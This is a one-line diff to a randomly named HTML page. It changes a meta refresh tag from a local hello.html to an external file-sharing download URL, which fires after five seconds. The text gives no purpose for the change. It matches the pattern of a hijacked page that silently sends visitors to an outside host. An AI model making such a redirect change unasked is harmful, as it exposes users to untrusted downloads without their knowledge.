--- a/YZJGL1lSYa.html
+++ b/YZJGL1lSYa.html
@@ -1,1 +1,1 @@
-<meta http-equiv="refresh" content="5;url=hello.html">
+<meta http-equiv="refresh" content="5;url=https://wwjt.lanzn.com/b052xlcod">
